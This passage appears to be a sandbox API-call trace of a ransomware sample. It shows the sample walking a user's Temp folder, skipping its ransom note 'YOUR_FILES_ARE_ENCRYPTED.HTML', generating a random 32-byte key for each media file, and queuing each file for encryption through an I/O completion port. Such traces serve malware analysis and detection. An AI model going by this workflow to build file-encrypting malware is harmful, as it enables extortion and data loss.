lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=45250) returned 1 [0164.223] GetProcessHeap () returned 0x270000 [0164.223] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a170 [0164.226] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="9C") returned 2 [0164.226] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="3B") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="E6") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="4F") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="99") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="68") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="79") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="C4") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="B3") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="3D") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="D0") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="AE") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="F4") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="03") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="CD") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="9F") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="83") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="FA") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="5A") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="5D") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="9F") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="D7") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="5F") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="2D") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="32") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="86") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="A4") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="61") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="01") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="F5") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="52") returned 2 [0164.228] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="4A") returned 2 [0164.228] lstrcpyW (in: lpString1=0x751a224, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a" [0164.228] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x750a170, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.228] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a170, lpOverlapped=0x750a170) returned 1 [0164.228] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x39412a20, ftCreationTime.dwHighDateTime=0x1d7dc08, ftLastAccessTime.dwLowDateTime=0x4b5cf870, ftLastAccessTime.dwHighDateTime=0x1d7e1c5, ftLastWriteTime.dwLowDateTime=0x4b5cf870, ftLastWriteTime.dwHighDateTime=0x1d7e1c5, nFileSizeHigh=0x0, nFileSizeLow=0x8a8, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="NsQYdkJrgZsh.bmp", cAlternateFileName="NSQYDK~1.BMP")) returned 1 [0164.228] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\NsQYdkJrgZsh.bmp") returned 59 [0164.228] lstrcmpW (lpString1="NsQYdkJrgZsh.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.228] PathFindExtensionW (pszPath="NsQYdkJrgZsh.bmp") returned=".bmp" [0164.228] lstrlenW (lpString=".bmp") returned 4 [0164.228] PathFindExtensionW (pszPath="NsQYdkJrgZsh.bmp") returned=".bmp" [0164.228] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40aed350, ftCreationTime.dwHighDateTime=0x1d7de53, ftLastAccessTime.dwLowDateTime=0xbe30f180, ftLastAccessTime.dwHighDateTime=0x1d7e71f, ftLastWriteTime.dwLowDateTime=0xbe30f180, ftLastWriteTime.dwHighDateTime=0x1d7e71f, nFileSizeHigh=0x0, nFileSizeLow=0x13ac5, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="O6G9QISY-h.mp3", cAlternateFileName="O6G9QI~1.MP3")) returned 1 [0164.228] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3") returned 57 [0164.228] lstrcmpW (lpString1="O6G9QISY-h.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.229] PathFindExtensionW (pszPath="O6G9QISY-h.mp3") returned=".mp3" [0164.229] lstrlenW (lpString=".mp3") returned 4 [0164.229] PathFindExtensionW (pszPath="O6G9QISY-h.mp3") returned=".mp3" [0164.229] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\o6g9qisy-h.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0164.230] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=80581) returned 1 [0164.230] GetProcessHeap () returned 0x270000 [0164.230] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75322c8 [0164.234] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="80") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="7A") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="64") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="FA") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="85") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="80") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="AE") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="80") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="E5") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="C1") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="0B") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="32") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="87") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="72") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="7B") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="8E") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="3F") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="62") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="50") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="73") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="74") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="DB") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="47") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="AC") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="9C") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="8F") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="0D") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="99") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="98") returned 2 [0164.235] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="FF") returned 2 [0164.235] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="71") returned 2 [0164.235] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6E") returned 2 [0164.235] lstrcpyW (in: lpString1=0x754237c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3" [0164.235] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x75322c8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.235] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75322c8, lpOverlapped=0x75322c8) returned 1 [0164.235] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ed76160, ftCreationTime.dwHighDateTime=0x1d7dd9b, ftLastAccessTime.dwLowDateTime=0x5877ab10, ftLastAccessTime.dwHighDateTime=0x1d7e416, ftLastWriteTime.dwLowDateTime=0x5877ab10, ftLastWriteTime.dwHighDateTime=0x1d7e416, nFileSizeHigh=0x0, nFileSizeLow=0x40cb, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="P0ZYRY4.mp4", cAlternateFileName="")) returned 1 [0164.235] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4") returned 54 [0164.235] lstrcmpW (lpString1="P0ZYRY4.mp4", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.235] PathFindExtensionW (pszPath="P0ZYRY4.mp4") returned=".mp4" [0164.235] lstrlenW (lpString=".mp4") returned 4 [0164.235] PathFindExtensionW (pszPath="P0ZYRY4.mp4") returned=".mp4" [0164.235] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\p0zyry4.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0164.236] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=16587) returned 1 [0164.236] GetProcessHeap () returned 0x270000 [0164.236] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a420 [0164.240] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="05") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="11") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="E6") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="34") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="87") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="50") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="B2") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="4F") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="7A") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="D4") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="C9") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="FA") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="BA") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="C4") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="FB") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="75") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D5") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="F2") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="14") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="5E") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="DB") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="84") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="CB") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="4D") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="8A") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="30") returned 2 [0164.241] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="AA") returned 2 [0164.241] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="E6") returned 2 [0164.241] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="D5") returned 2 [0164.241] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="CE") returned 2 [0164.241] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="0B") returned 2 [0164.241] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6B") returned 2 [0164.241] lstrcpyW (in: lpString1=0x756a4d4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4" [0164.241] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x755a420, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.241] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a420, lpOverlapped=0x755a420) returned 1 [0164.241] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1a10e310, ftCreationTime.dwHighDateTime=0x1d7e406, ftLastAccessTime.dwLowDateTime=0xae5879a0, ftLastAccessTime.dwHighDateTime=0x1d7e52a, ftLastWriteTime.dwLowDateTime=0xae5879a0, ftLastWriteTime.dwHighDateTime=0x1d7e52a, nFileSizeHigh=0x0, nFileSizeLow=0xe304, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="pu5v.gif", cAlternateFileName="")) returned 1 [0164.241] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif") returned 51 [0164.242] lstrcmpW (lpString1="pu5v.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.242] PathFindExtensionW (pszPath="pu5v.gif") returned=".gif" [0164.242] lstrlenW (lpString=".gif") returned 4 [0164.242] PathFindExtensionW (pszPath="pu5v.gif") returned=".gif" [0164.242] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\pu5v.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5bc [0164.242] GetFileSizeEx (in: hFile=0x5bc, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=58116) returned 1 [0164.242] GetProcessHeap () returned 0x270000 [0164.242] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7582578 [0164.246] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="42") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="44") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="0C") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="BC") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="19") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="BE") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="37") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="32") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="62") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="06") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="53") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="1B") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="5C") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="7F") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="1D") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="97") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D1") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="89") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="4E") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="7B") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="6A") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="9A") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="C7") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="C1") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="62") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="3B") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="B0") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="B9") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="41") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="82") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="05") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="09") returned 2 [0164.247] lstrcpyW (in: lpString1=0x759262c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif" [0164.247] CreateIoCompletionPort (FileHandle=0x5bc, ExistingCompletionPort=0x3a0, CompletionKey=0x7582578, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.247] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7582578, lpOverlapped=0x7582578) returned 1 [0164.247] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1f3f1600, ftCreationTime.dwHighDateTime=0x1d7e400, ftLastAccessTime.dwLowDateTime=0x4041f540, ftLastAccessTime.dwHighDateTime=0x1d7e539, ftLastWriteTime.dwLowDateTime=0x4041f540, ftLastWriteTime.dwHighDateTime=0x1d7e539, nFileSizeHigh=0x0, nFileSizeLow=0xc47a, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="PUjBXDA3t4.png", cAlternateFileName="PUJBXD~1.PNG")) returned 1 [0164.248] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png") returned 57 [0164.248] lstrcmpW (lpString1="PUjBXDA3t4.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.248] PathFindExtensionW (pszPath="PUjBXDA3t4.png") returned=".png" [0164.248] lstrlenW (lpString=".png") returned 4 [0164.248] PathFindExtensionW (pszPath="PUjBXDA3t4.png") returned=".png" [0164.248] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\pujbxda3t4.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c0 [0164.248] GetFileSizeEx (in: hFile=0x5c0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=50298) returned 1 [0164.248] GetProcessHeap () returned 0x270000 [0164.248] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa6d0 [0164.252] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="D1") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="C2") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="0E") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="B7") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="AC") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="BA") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="60") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="49") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="66") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="84") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="51") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="9F") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="E7") returned 2 [0164.252] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="34") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="2F") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="4C") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="8B") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="F0") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="75") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="A5") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="53") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="6E") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="BA") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="F1") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="E9") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="A6") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="78") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="5B") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="71") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="40") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="DF") returned 2 [0164.253] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="12") returned 2 [0164.254] lstrcpyW (in: lpString1=0x75ba784, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\PUjBXDA3t4.png" [0164.254] CreateIoCompletionPort (FileHandle=0x5c0, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa6d0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.254] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa6d0, lpOverlapped=0x75aa6d0) returned 1 